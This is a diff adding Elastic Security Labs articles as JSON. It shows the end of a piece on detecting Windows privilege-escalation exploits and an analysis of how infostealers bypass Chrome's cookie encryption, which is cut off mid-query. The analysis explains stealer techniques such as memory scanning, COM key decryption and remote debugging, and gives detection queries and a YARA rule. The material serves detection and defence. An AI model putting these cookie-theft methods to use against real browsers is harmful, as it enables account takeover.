\"C:\\\\*\\\\Windows\\\\syswow64\\\\*.dll\", \"C:\\\\*\\\\Windows\\\\assembly\\\\NativeImages*.dll\")\n )\n```\n\n\n\n\nThis also matches on [this](https://github.com/elastic/protections-artifacts/blob/72fd8cad90189e9d145d22eb3d4fee2fe3d5902f/behavior/rules/privilege_escalation_untrusted_dll_loaded_by_a_system_windows_process.toml) generic endpoint detection, which looks for untrusted modules loaded by elevated system native processes:\n\n\n\n\n## Generic Behavior Detection\n\nThe examples provided above illustrate that each vulnerability possesses distinct characteristics. Exploitation methods vary depending on the flexibility of primitives, such as writing to an address, executing shellcode, loading an arbitrary DLL, or creating a file. Certain system components may harbor more vulnerabilities than others, warranting dedicated detection efforts (e.g., CLFS, win32k).\n\nNevertheless, these vulnerabilities' ultimate objective and impact remain consistent. This underscores the opportunity to devise more effective detection strategies.\n\nPrivilege escalation can manifest in various forms:\n - A low/medium integrity process spawning an elevated child process\n - A low/medium integrity process injecting code into an elevated process\n - A system integrity process unexpectedly loads an untrusted DLL\n - A system native process unexpectedly drops PE files\n - A low/medium integrity process dropping files to system-protected folders\n - A user-mode process writing to a kernel mode address\n\nLeveraging Elastic Defend’s capabilities, we can design detections and hunt for each of the possibilities above.\n\n**Low/Medium integrity process spawning an elevated child process**:\n\n```\nsequence with maxspan=5m\n [process where event.action == \"start\" and\n process.Ext.token.integrity_level_name in (\"medium\", \"low\")] by process.entity_id\n [process where event.action == \"start\" and\n process.Ext.token.integrity_level_name == \"system\" and user.id : \"S-1-5-18\"] by process.parent.entity_id\n```\n\nExample of matches on a [sample](https://www.virustotal.com/gui/file/b17c0bdffa9086531e05677aad51252c6a883598109473fc2f4b4b8bfec8b6d3/) exploiting a vulnerable driver (Zemana `zam64.sys`) to spawn `cmd.exe` as SYSTEM: \n\n\n\n\n**Low/medium integrity process injecting code into an elevated process**:\n\nHere is an [ES|QL](https://www.elastic.co/guide/en/elasticsearch/reference/current/esql.html) query to look for rare cross-process API calls: \n\n```\nfrom logs-endpoint.events.api*\n| where process.Ext.token.integrity_level_name in (\"medium\", \"low\") and Target.process.Ext.token.integrity_level_name == \"system\" and\n process.Ext.api.name in (\"WriteProcessMemory\", \"VirtualProtect\", \"VirtualAllocEx\", \"VirtualProtectEx\", \"QueueUserAPC\", \"MapViewOfFile\", \"MapViewOfFileEx\")\n| stats occurrences = count(*), agents = count_distinct(host.id) by process.Ext.api.name, process.executable, Target.process.executable\n| where agents == 1 and occurrences <= 100\n```\n\nWhen we run this query, we get LPE exploits injecting into ```winlogon.exe``` post-elevation via token swapping: \n\n\n\n\n**System integrity process unexpectedly loads an untrusted DLL**\n\nHere’s an ES|QL query to look for rare unsigned DLLs that have been loaded by an elevated Microsoft binary: \n\n```\nfrom logs-endpoint.events.library-*\n| where host.os.family == \"windows\" and event.action == \"load\" and\n starts_with(process.code_signature.subject_name, \"Microsoft\") and \n user.id in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and \n process.code_signature.status == \"trusted\" and \n dll.Ext.relative_file_creation_time <= 500 and\n (dll.code_signature.exists == false or dll.code_signature.trusted == false) and \n\n /* excluding noisy DLL paths */ \n not dll.path rlike \"\"\"[C-F]:\\\\Windows\\\\(assembly|WinSxS|SoftwareDistribution|SystemTemp)\\\\.+\\.dll\"\"\" and\n\n /* excluding noisy processes and potentially unrelated to exploits - svchost must be covered by a dedicated hunt to exclude service dlls and COM */\nnot process.name in (\"rundll32.exe\", \"regsvr32.exe\", \"powershell.exe\", \"msiexec.exe\", \"svchost.exe\", \"w3wp.exe\", \"mscorsvw.exe\", \"OfficeClickToRun.exe\", \"SetupHost.exe\", \"UpData.exe\", \"DismHost.exe\")\n\n| stats occurrences = count(*), host_count = count_distinct(host.id) by dll.name, process.name\n/* loaded once and the couple dll.name process.name are present in one agent across the fleet */\n| where occurrences == 1 and host_count == 1\n```\n\n\n\n\n**A system native process unexpectedly drops PE files**\n\nThe following ES|QL query can be used to hunt for instances of a privileged Microsoft signed binary that has a low count of executable file creation history and is limited to one agent across the fleet of monitored hosts: \n\n```\nfrom logs-endpoint.events.file-*\n| where @timestamp > now() - 30 day\n| where host.os.family == \"windows\" and event.category == \"file\" and event.action == \"creation\" and user.id in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\", \"S-1-5-90-0-*\") and\n starts_with(file.Ext.header_bytes, \"4d5a\") and process.code_signature.status == \"trusted\" and\n starts_with(process.code_signature.subject_name, \"Microsoft\") and \n process.executable rlike \"\"\"[c-fC-F]:\\\\Windows\\\\(System32|SysWOW64)\\\\[a-zA-Z0-9_]+.exe\"\"\" and\n not process.name in (\"drvinst.exe\", \"MpSigStub.exe\", \"cmd.exe\")\n| keep process.executable, host.id\n| stats occurrences = count(*), agents = count_distinct(host.id) by process.executable\n| where agents == 1 and occurrences == 1\n```\n\n\n\n\n**User-mode process writing to a kernel mode address**\n\nCorrupting [PreviousMode](https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/previousmode) is a widely popular exploitation technique. Overwriting this one byte in the [KTHREAD](https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/ntos/ke/kthread/index.htm) structure bypasses kernel-mode checks inside syscalls such as ```NtReadVirtualMemory``` or ```NtWriteVirtualMemory```, allowing a user-mode attacker to read and write arbitrary kernel memory.\n\nOn x64, the virtual address space is divided into the user mode addresses ranging from ```0x00000000 00000000``` - ```0x0000FFFF FFFFFFFF``` and the kernel mode address ranging from ```0xFFFF0000 00000000``` - ```0xFFFFFFFF FFFFFFFF```. The following EQL query can be used to detect API `NtReadVirtualMemory` or ```NtReadVirtualMemory``` calls where the target address is a kernel mode one, which is an abnormal behavior:\n\n```\napi where process.pid != 4 and process.Ext.api.name : \"WriteProcessMemory\"\n and process.executable != null and \n /* kernel mode address range - decimal */\n process.Ext.api.parameters.address > 281474976710655\n```\n \nHere is an example of these [alerts](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/privilege_escalation_suspicious_kernel_mode_address_manipulation.tom) triggering on exploits leveraging this primitive: \n\n\n\n\n## Conclusion\n\nDetecting elevation of privileges for specific vulnerabilities requires a deep understanding of the vulnerability and its exploitation methods, which is not common knowledge. Therefore, investing in generic behavioral detection mechanisms focusing on the exploit effect on the system and frequently used primitives like [KASLR bypass](https://github.com/waleedassar/RestrictedKernelLeaks), [token swapping](https://www.ired.team/miscellaneous-reversing-forensics/windows-kernel-internals/how-kernel-exploits-abuse-tokens-for-privilege-escalation), [PreviousMode abuse](https://research.nccgroup.com/2020/05/25/cve-2018-8611-exploiting-windows-ktm-part-5-5-vulnerability-detection-and-a-better-read-write-primitive/#previousmode-abuse), and others proves more effective. However, for highly targeted Windows system components such as CLFS and win32k, dedicated detections are always valuable - ideally a combination of behavior and YARA.\n\nDespite the technical intricacies and the absence of logs for common primitives, the blue team should not disregard exploit and vulnerability research content; rather, they should endeavor to comprehend and apply it. Additionally, sharing via VirusTotal or similar in-the-wild LPE exploit samples with the defensive community will facilitate further the testing and enhancement of detection controls.\n\nAdditional detection rules for [exploitation for privilege escalation](https://attack.mitre.org/techniques/T1068/) can be accessed [here](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22T1068%22&type=code&p=1).\n\n## References\n - https://i.blackhat.com/USA-22/Thursday/us-22-Jin-The-Journey-Of-Hunting-ITW-Windows-LPE-0day-wp.pdf\n - https://securelist.com/windows-clfs-exploits-ransomware/111560/\n - https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part2-exploit-analysis\n - https://googleprojectzero.github.io/0days-in-the-wild/rca.html\n - https://conference.hitb.org/hitbsecconf2023ams/session/hunting-windows-desktop-window-manager-bugs/\n - https://research.checkpoint.com/2024/raspberry-robin-keeps-riding-the-wave-of-endless-1-days/\n\n\n\n\n\n\n\n\n"
+ },
+ "title": "In-the-Wild Windows LPE 0-days: Insights & Detection Strategies",
+ "slug": "itw-windows-lpe-0days-insights-and-detection-strategies",
+ "date": "2024-03-29",
+ "description": "This article will evaluate detection methods for Windows local privilege escalation techniques based on dynamic behaviors analysis using Elastic Defend features.",
+ "author": [
+ {
+ "slug": "samir-bousseaden"
+ }
+ ],
+ "image": "image18.jpg",
+ "category": [
+ {
+ "slug": "security-operations"
+ }
+ ],
+ "tags": [
+ {
+ "slug": "windows"
+ }
+ ]
+ },
+ "id": "security_labs_content-itw_windows_lpe_0days_insights_and_detection_strategies-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-katz_and_mouse_game-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-katz_and_mouse_game-md.json
new file mode 100644
index 00000000000..503cf612568
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-katz_and_mouse_game-md.json
@@ -0,0 +1,50 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Katz and Mouse Game: MaaS Infostealers Adapt to Patched Chrome Defenses\"\nslug: \"katz-and-mouse-game\"\ndate: \"2024-10-28\"\ndescription: \"Elastic Security Labs breaks down bypass implementations from the infostealer ecosystem’s reaction to Chrome 127's Application-Bound Encryption scheme.\"\nauthor:\n - slug: jia-yu-chan\n - slug: salim-bitam\n - slug: daniel-stepanic\n - slug: samir-bousseaden\n - slug: cyril-francois\n - slug: seth-goodwin\nimage: \"Security Labs Images 2.jpg\"\ncategory:\n - slug: malware-analysis\ntags:\n - infostealer\n - chrome\n - cookie\n - VIDAR\n - STEALC\n - LUMMA\n - METASTEALER\n - PHEMEDRONE\n - XENOSTEALER\n---\n\n# Introduction\n\nIn July, Google [announced](https://security.googleblog.com/2024/07/improving-security-of-chrome-cookies-on.html) a new protection mechanism for cookies stored within Chrome on Windows, known as Application-Bound Encryption. There is no doubt this security implementation has raised the bar and directly impacted the malware ecosystem. After months with this new feature, many infostealers have written new code to bypass this protection (as the Chrome Security Team predicted) in order to stay competitive in the market and deliver capabilities that reliably retrieve cookie data from Chrome browsers.\n\nElastic Security Labs has been tracking a subset of this activity, identifying multiple techniques used by different malware families to circumvent App-Bound Encryption. While the ecosystem is still evolving in light of this pressure, our goal is to share technical details that help organizations understand and defend against these techniques. In this article, we will cover the different methods used by the following infostealer families:\n\n - STEALC/VIDAR\n - METASTEALER\n - PHEMEDRONE\n - XENOSTEALER\n - LUMMA\n\n# Key takeaways\n\n - Latest versions of infostealers implement bypasses around Google’s recent cookie protection feature using Application-Bound Encryption\n - Techniques include integrating offensive security tool ChromeKatz, leveraging COM to interact with Chrome services and decrypt the app-bound encryption key, and using the remote debugging feature within Chrome\n - Defenders should actively monitor for different cookie bypass techniques against Chrome on Windows in anticipation of future mitigations and bypasses likely to emerge in the near- to mid-term\n - Elastic Security provides mitigations through memory signatures, behavioral rules, and hunting opportunities to enable faster identification and response to infostealer activity\n\n# Background\n\nGenerically speaking, cookies are used by web applications to store visitor information in the browser the visitor uses to access that web app. This information helps the web app track that user, their preferences, and other information from location to location– even across devices.\n\nThe authentication token is one use of the client-side data storage structures that enables much of how modern web interactivity works. These tokens are stored by the browser after the user has successfully authenticated with a web application. After username and password, after multifactor authentication (MFA) via one-time passcodes or biometrics, the web application “remembers” your browser is you via the exchange of this token with each subsequent web request.\n\nA malicious actor who gets access to a valid authentication token can reuse it to impersonate the user to that web service with the ability to take over accounts, steal personal or financial information, or perform other actions as that user such as transfer financial assets.\n\nCybercriminals use infostealers to steal and commoditize this type of information for their financial gain.\n\n## Google Chrome Cookie Security\n\nLegacy versions of Google Chrome on Windows used the Windows native [Data Protection API](https://learn.microsoft.com/en-us/dotnet/standard/security/how-to-use-data-protection) (DPAPI) to encrypt cookies and protect them from other user contexts. This provided adequate protection against several attack scenarios, but any malicious software running in the targeted user’s context could decrypt these cookies using the DPAPI methods directly. Unfortunately, this context is exactly the niche that infostealers often find themselves in after social engineering for initial access. The DPAPI scheme is now [well known to attackers](https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107) with several attack vectors; from local decryption using the API, to stealing the masterkey and decrypting remotely, to abusing the domain-wide backup DPAPI key in an enterprise environment.\n\nWith the release of Chrome 127 in July 2024, Google [implemented](https://developer.chrome.com/release-notes/127) Application-Bound Encryption of browser data. This mechanism directly addressed many common DPAPI attacks against Windows Chrome browser data–including cookies. It does this by storing the data in encrypted datafiles, and using a service running as SYSTEM to verify any decryption attempts are coming from the Chrome process before returning the key to that process for decryption of the stored data.\n\n\n\n\n\nWhile it is our view that this encryption scheme is not a panacea to protect all browser data (as the Chrome Security Team acknowledges in their release) we do feel it has been successful in driving malware authors to TTPs that are more overtly malicious, and easier for defenders to identify and respond to.\n\n# Stealer Bypass Techniques, Summarized\n\nThe following sections will describe specific infostealer techniques used to bypass Google’s App-Bound Encryption feature as observed by Elastic. Although this isn’t an exhaustive compilation of bypasses, and development of these families is ongoing, they represent an interesting dynamic within the infostealer space showing how malware developers responded to Google’s recently updated security control. The techniques observed by our team include:\n\n - Remote debugging via Chrome’s DevTools Protocol\n - Reading process memory of Chrome network service process (ChromeKatz and ```ReadProcessMemory``` (RPM))\n - Elevating to ```SYSTEM``` then decrypting ```app_bound_encryption_key``` with the ```DecryptData``` method of ```GoogleChromeElevationService``` through COM\n\n\n\n## STEALC/VIDAR\n\nOur team observed new code introduced to STEALC/VIDAR related to the cookie bypass technique around September 20th. These were atypical samples that stood out from previous versions and were implemented as embedded 64-bit PE files along with conditional checks. Encrypted values in the SQLite databases where Chrome stores its data are now prefixed with v20, indicating that the values are now encrypted using application-bound encryption.\n\n> [STEALC](https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc) was introduced in 2023 and was developed with “heavy inspiration” from other more established stealers such as [RACOON](https://malpedia.caad.fkie.fraunhofer.de/details/win.raccoon) and [VIDAR](https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar). STEALC and VIDAR have continued concurrent development, and in the case of App-Bound Encryption bypasses have settled on the same implementation.\n\nDuring the extraction of encrypted data from the databases the malware checks for this prefix. If it begins with ```v20```, a child process is spawned using the embedded PE file in the ```.data``` section of the binary. This program is responsible for extracting unencrypted cookie values residing in one of Chrome's child processes. \n\n\n\nThis embedded binary creates a hidden desktop via ```OpenDesktopA``` / ```CreateDesktopA``` then uses ```CreateToolhelp32Snapshot``` to scan and terminate all ```chrome.exe``` processes. A new ```chrome.exe``` process is then started with the new desktop object. Based on the installed version of Chrome, the malware selects a signature pattern for the Chromium feature [CookieMonster](https://www.chromium.org/developers/design-documents/network-stack/cookiemonster/), an internal component used to manage cookies.\n\n\n\nWe used the [signature patterns](https://github.com/Meckazin/ChromeKatz/blob/9152004174e9a0b2d092c70ebc75efbf80fa1098/CookieKatz/Main.cpp#L123) to pivot to existing code developed for an offensive security tool called [ChromeKatz](https://github.com/Meckazin/ChromeKatz). At this time, the patterns have been removed from the ChromeKatz repository and replaced with a new technique. Based on our analysis, the malware author appears to have reimplemented ChromeKatz within STEALC in order to bypass the app-bound encryption protection feature. \n\nOnce the malware identifies a matching signature, it enumerates Chrome’s child processes to check for the presence of the ```--utility-sub-type=network.mojom.NetworkService``` command-line flag. This flag indicates that the process is the network service responsible for handling all internet communication. It becomes a prime target as it holds the sensitive data the attacker seeks, as described in MDSec’s [post](https://www.mdsec.co.uk/2021/01/breaking-the-browser-a-tale-of-ipc-credentials-and-backdoors/). It then returns a handle for that specific child process. \n\n\n\nNext, it enumerates each module in the network service child process to find and retrieve the base address and size of ```chrome.dll``` loaded into memory. STEALC uses [```CredentialKatz::FindDllPattern```](https://github.com/Meckazin/ChromeKatz/blob/767047dcf8f53c70be5e3e0859c5eee3f129d758/CredentialKatz/Memory.cpp#L280) and [```CookieKatz::FindPattern```](https://github.com/Meckazin/ChromeKatz/blob/767047dcf8f53c70be5e3e0859c5eee3f129d758/CookieKatz/Memory.cpp#L435) to locate the CookieMonster instances. There are 2 calls to ```CredentialKatz::FindDllPattern```.\n\n\n\nIn the first call to ```CredentialKatz::FindDllPattern```, it tries to locate one of the signature patterns (depending on the victim’s Chrome version) in ```chrome.dll```. Once found, STEALC now has a reference pointer to that memory location where the byte sequence begins which is the function ```net::CookieMonster::~CookieMonster```, destructor of the ```CookieMonster``` class.\n\n\n\nThe second call to ```CredentialKatz::FindDllPattern``` passes in the function address for ```net::CookieMonster::~CookieMonster(void)``` as an argument for the byte sequence search, resulting in STEALC having a pointer to ```CookieMonster```’s Virtual Function Pointer struct.\n\n\n\nThe following method used by STEALC is again, identical to ChromeKatz, where it locates ```CookieMonster``` instances by scanning memory chunks in the ```chrome.dll``` module for pointers referencing the ```CookieMonster``` vtable. Since the vtable is a constant across all objects of a given class, any ```CookieMonster``` object will have the same vtable pointer. When a match is identified, STEALC treats the memory location as a ```CookieMonster``` instance and stores its address in an array.\n\n\n\nFor each identified ```CookieMonster``` instance, STEALC accesses the internal ```CookieMap``` structure located at an offset of ```+0x30```, and which is a binary tree. Each node within this tree contains pointers to ```CanonicalCookieChrome``` structures. ```CanonicalCookieChrome``` structures hold unencrypted cookie data, making it accessible for extraction. STEALC then initiates a tree traversal by passing the first node into a dedicated traversal function.\n\n\n\nFor each node, it calls ```ReadProcessMemory``` to access the ```CanonicalCookieChrome``` structure from the target process’s memory, then further processing it in ```jy::GenerateExfilString```. \n\n\n\nSTEALC formats the extracted cookie data by converting the expiration date to UNIX format and verifying the presence of the ```HttpOnly``` and ```Secure``` flags. It then appends details such as the cookie's name, value, domain, path, and the ```HttpOnly``` and ```Secure``` into a final string for exfiltration. [```OptimizedString```](https://github.com/Meckazin/ChromeKatz/blob/9152004174e9a0b2d092c70ebc75efbf80fa1098/CookieKatz/Memory.cpp#L10) structs are used in place of strings, so string values can either be the string itself, or if the string length is greater than 23, it will point to the address storing the string. \n\n\n\n## METASTEALER\n\n[METASTEALER](https://malpedia.caad.fkie.fraunhofer.de/details/win.metastealer), first observed in 2022, recently upgraded its ability to steal Chrome data, bypassing Google’s latest mitigation efforts. On September 30th, the malware authors announced this update via their Telegram channel, highlighting its enhanced capability to extract sensitive information, including cookies, despite the security changes in Chrome's version ```129+```.\n\n\n\n\n\nThe [first sample](https://www.virustotal.com/gui/file/973a9056040af402d6f92f436a287ea164fae09c263f80aba0b8d5366ed9957a) observed in the wild by our team was discovered on September 30th, the same day the authors promoted the update. Despite claims that the malware operates without needing ```Administrator``` privileges, our testing revealed it does require elevated access, as it attempts to impersonate the ```SYSTEM``` token during execution.\n\n\n\nAs shown in the screenshots above, the ```get_decryption``` method now includes a new Boolean parameter. This value is set to ```TRUE``` if the encrypted data (cookie) begins with the ```v20``` prefix, indicating that the cookie is encrypted using Chrome's latest encryption method. The updated function retains backward compatibility, still supporting the decryption of cookies from older Chrome versions if present on the infected machine.\n\nThe malware then attempts to access the ```Local State``` or ```LocalPrefs.json``` files located in the Chrome profile directory. Both files are JSON formatted and store encryption keys (```encrypted_key```) for older Chrome versions and ```app_bound_encrypted_key``` for newer ones. If the flag is set to ```TRUE```, the malware specifically uses the ```app_bound_encrypted_key``` to decrypt cookies in line with the updated Chrome encryption method.\n\n\n\nIn this case, the malware first impersonates the ```SYSTEM``` token using a newly introduced class called ```ContextSwitcher```.\n\n\n\nIt then decrypts the key by creating an instance via the COM of the Chrome service responsible for decryption, named ```GoogleChromeElevationService```, using the CLSID ```708860E0-F641-4611-8895-7D867DD3675B```. Once initialized, it invokes the [```DecryptData```](https://github.com/chromium/chromium/blob/225f82f8025e4f93981310fd33daa71dc972bfa9/chrome/elevation_service/elevator.cc#L155) method to decrypt the ```app_bound_encrypted_key``` key which will be used to decrypt the encrypted cookies.\n\n\n\nMETASTEALER employs a technique similar to the one demonstrated in a [gist](https://gist.github.com/snovvcrash/caded55a318bbefcb6cc9ee30e82f824) shared [on X](https://x.com/snovvcrash/status/1839715912812802162) on September 27th, which may have served as inspiration for the malware authors. Both approaches leverage similar methods to bypass Chrome's encryption mechanisms and extract sensitive data.\n\n## PHEMEDRONE\n\nThis [open-source stealer](https://malpedia.caad.fkie.fraunhofer.de/details/win.phemedrone_stealer) caught the world’s attention earlier in the year through its usage of a Windows SmartScreen vulnerability (CVE-2023-36025). While its development is still occurring on Telegram, our team found a recent [release](https://www.virustotal.com/gui/file/1067d27007ea862ddd68e90ef68b6d17fa18f9305c09f72bad04d00102a60b8c) (2.3.2) submitted at the end of September including new cookie grabber functionality for Chrome.\n\n\n\nThe malware first enumerates the different profiles within Chrome, then performs a browser check using function (```BrowserHelpers.NewEncryption```) checking for the Chrome browser with a version greater than or equal to ```127```.\n\n\n\nIf the condition matches, PHEMEDRONE uses a combination of helper functions to extract the cookies.\n\n\n\nBy viewing the ```ChromeDevToolsWrapper``` class and its different functions, we can see that PHEMEDRONE sets up a remote debugging session within Chrome to access the cookies. The default port (```9222```) is used along with window-position set to ```-2400```,```-2400``` which is set off-screen preventing any visible window from alerting the victim.\n\n\n\nNext, the malware establishes a WebSocket connection to Chrome’s debugging interface making a request using deprecated Chrome DevTools Protocol method (```Network.getAllCookies```). \n\n\n\nThe cookies are then returned from the previous request in plaintext, below is a network capture showing this behavior:\n\n\n\n## XENOSTEALER\n\n[XENOSTEALER](https://github.com/moom825/XenoStealer/) is an open-source infostealer hosted on GitHub. It appeared in July 2024 and is under active development at the time of this publication. Notably, the Chrome bypass feature was committed on September 26, 2024.\n\nThe approach taken by XENOSTEALER is similar to that of METASTEALER. It first parses the JSON file under a given Chrome profile to extract the ```app_bound_encrypted_key```. However, the decryption process occurs within a Chrome process. To achieve this, XENOSTEALER launches an instance of ```Chrome.exe```, then injects code using a helper class called [```SharpInjector```](https://github.com/moom825/XenoStealer/blob/d1c7e242183a2c8582c179a1b546f0a5cdff5f75/XenoStealer/Injector/SharpInjector.cs), passing the encrypted key as a parameter.\n\nThe injected code subsequently calls the ```DecryptData``` method from the ```GoogleChromeElevationService``` to obtain the decrypted key.\n\n \n\n## LUMMA\n\nIn mid-October, the latest version of [LUMMA](https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma) implemented a new method to bypass Chrome cookie protection, as reported by [@g0njxa](https://x.com/g0njxa).\n\n\n\nWe analyzed a recent version of LUMMA, confirming that it managed to successfully recover the cookie data from the latest version of Google Chrome (```130.0.6723.70```). LUMMA first creates a visible Chrome process via ```Kernel32!CreateProcessW```.\n\n\n\nThis activity was followed up in the debugger with multiple calls to ```NtReadVirtualMemory``` where we identified LUMMA searching within the Chrome process for ```chrome.dll```.\n\n\n\nOnce found, the malware copies the ```chrome.dll``` image to its own process memory using ```NtReadVirtualMemory```. In a similar fashion to the ChromeKatz technique, Lumma leverages pattern scanning to target Chrome’s ```CookieMonster``` component. \n\n\n\nLumma uses an obfuscated signature pattern to pinpoint the ```CookieMonster``` functionality:\n\n```\n3Rf5Zn7oFA2a????k4fAsdxx????l8xX5vJnm47AUJ8uXUv2bA0s34S6AfFA????kdamAY3?PdE????6G????L8v6D8MJ4uq????k70a?oAj7a3????????K3smA????maSd?3l4\n```\n\nBelow is the YARA rule after de-obfuscation:\n\n```\nrule lumma_stealer\n{\n meta:\n author = \"Elastic Security Labs\"\n strings:\n $lumma_pattern = { 56 57 48 83 EC 28 89 D7 48 89 CE E8 ?? ?? ?? ?? 85 FF 74 08 48 89 F1 E8 ?? ?? ?? ?? 48 89 F0 48 83 C4 28 5F 5E C3 CC CC CC CC CC CC CC CC CC CC 56 57 48 83 EC 38 48 89 CE 48 8B 05 ?? ?? ?? ?? 48 31 E0 48 89 44 24 ?? 48 8D 79 ?? ?? ?? ?? 28 E8 ?? ?? ?? ?? 48 8B 46 20 48 8B 4E 28 48 8B 96 ?? ?? ?? ?? 4C 8D 44 24 ?? 49 89 10 48 C7 86 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 FA FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 31 E1}\n condition:\n all of them\n}\n```\n\nAfter decoding and searching for the pattern in ```chrome.dll```, this leads to the ```CookieMonster``` destructor ([```net::CookieMonster::~CookieMonster```](https://chromium.googlesource.com/chromium/src/net/+/master/cookies/cookie_monster.cc#657)).\n\n\n\nThe cookies are then identified in memory and dumped out in clear text from the Chrome process.\n\n\n\nOnce completed, LUMMA sends out the cookies along with the other requested data as multiple zip files (xor encrypted and base64 encoded) to the C2 server.\n\n\n\n# Detection\n\nBelow are the following behavioral detections that can be used to identify techniques used by information stealers: \n\n - [Web Browser Credential Access via Unusual Process](https://github.com/elastic/protections-artifacts/blob/da25aa57994ee265583227dbe6fe02261b65415c/behavior/rules/windows/credential_access_web_browser_credential_access_via_unusual_process.toml#L8)\n - [Web Browser Credential Access via Unsigned Process](https://github.com/elastic/protections-artifacts/blob/da25aa57994ee265583227dbe6fe02261b65415c/behavior/rules/windows/credential_access_web_browser_credential_access_via_unsigned_process.toml#L8)\n - [Access to Browser Credentials from Suspicious Memory](https://github.com/elastic/protections-artifacts/blob/da25aa57994ee265583227dbe6fe02261b65415c/behavior/rules/windows/credential_access_access_to_browser_credentials_from_suspicious_memory.toml#L8)\n - [Failed Access Attempt to Web Browser Files](https://github.com/elastic/protections-artifacts/blob/da25aa57994ee265583227dbe6fe02261b65415c/behavior/rules/windows/credential_access_failed_access_attempt_to_web_browser_files.toml#L8)\n - [Browser Debugging from Unusual Parent](https://github.com/elastic/protections-artifacts/blob/da25aa57994ee265583227dbe6fe02261b65415c/behavior/rules/windows/credential_access_browser_debugging_from_unusual_parent.toml#L3)\n - [Potential Browser Information Discovery](https://github.com/elastic/protections-artifacts/blob/da25aa57994ee265583227dbe6fe02261b65415c/behavior/rules/windows/discovery_potential_browser_information_discovery.toml#L8)\n\nAdditionally, the following queries can be used for hunting diverse related abnormal behaviors: \n\n## Cookies access by an unusual process\n\nThis query uses file open events and aggregate accesses by process, then looks for ones that are observed in unique hosts and with a low total access count:\n\n``` sql\nFROM logs-endpoint.events.file-default*\n| where event.category == \"file\" and event.action == \"open\" and file.name == \"Cookies\" and file.path like \"*Chrome*\"\n| keep file.path, process.executable, agent.id\n| eval process_path = replace(to_lower(process.executable), \"\"\"c:\\\\users\\\\[a-zA-Z0-9\\.\\-\\_\\$]+\\\\\"\"\", \"c:\\\\\\\\users\\\\\\\\user\\\\\\\\\")\n| stats agents_count = COUNT_DISTINCT(agent.id), access_count= count(*) by process_path\n| where agents_count <= 2 and access_count <=2\n```\n\nBelow example of matches from diverse information stealers including the updated ones with new Chrome cookies stealing capabilities: \n\n\n\nMETASTEALER behavior tends to first terminate all running chrome instances then calls [```CoCreateInstance```](https://learn.microsoft.com/en-us/windows/win32/api/combaseapi/nf-combaseapi-cocreateinstance) to instantiate the Google Chrome [elevation service](https://chromium.googlesource.com/chromium/src/+/main/chrome/elevation_service/), this series of events can be expressed with the following EQL query: \n\n``` sql\nsequence by host.id with maxspan=1s\n[process where event.action == \"end\" and process.name == \"chrome.exe\"] with runs=5\n[process where event.action == \"start\" and process.name == \"elevation_service.exe\"]\n```\n\n\n\nThe previous hunt indicates suspicious agents but doesn't identify the source process. By [enabling registry object access auditing through event 4663](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4663) on the Chrome Elevation service CLSID registry key ```{708860E0-F641-4611-8895-7D867DD3675B}```, we can detect unusual processes attempting to access that key: \n\n\n\n``` sql\nFROM logs-system.security-default* | where event.code == \"4663\" and winlog.event_data.ObjectName == \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{708860E0-F641-4611-8895-7D867DD3675B}\" and not winlog.event_data.ProcessName in (\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\", \"C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\") and not winlog.event_data.ProcessName like \"C:\\\\\\\\Program Files\\\\\\\\Google\\\\\\\\Chrome\\\\\\\\Application\\\\\\\\*\\\\\\\\elevation_service.exe\" | stats agents_count = COUNT_DISTINCT(agent.id), access_count= count(*) by winlog.event_data.ProcessName | where agents_count <= 2 and access_count <=2\n```\n\nBelow is an example of matches on the METASTEALER malware while calling ```CoCreateInstance (CLSID_Elevator)```: \n\n\n\nThe [PHEMEDRONE](https://malpedia.caad.fkie.fraunhofer.de/details/win.phemedrone_stealer) stealer uses the [known](https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e) browser debugging method to collect cookies via Chromium API, this can be observed in the following screenshot where we can see an instance of NodeJs communicating with a browser instance with debugging enabled over port ```9222```:\n\n\n\nThe following EQL query can be used to look for unusual processes performing similar behavior: \n\n``` sql\nsequence by host.id, destination.port with maxspan=5s\n[network where event.action == \"disconnect_received\" and\n network.direction == \"ingress\" and\n process.executable in~ (\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n\"C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\") and\n source.address like \"127.*\" and destination.address like \"127.*\"]\n[network where event.action == \"disconnect_received\" and network.direction == \"egress\" and not\n process.executable in~ (\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n\"C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\") and source.address like \"127.*\" and destination.address like \"127.*\"]\n```\n\n\n\n## Chrome Browser Spawned from an Unusual Parent\n\nThe STEALC sample that uses ChromeKatz implementation spawns an instance of Google Chrome to load the user default profile, while looking for normal parent executables, it turns out it’s limited to Chrome signed parents and Explorer.exe, the following ES|QL query can be used to find unusual parents: \n\n``` sql\nFROM logs-endpoint.events.process-*\n| where event.category == \"process\" and event.type == \"start\" and to_lower(process.name) == \"chrome.exe\" and process.command_line like 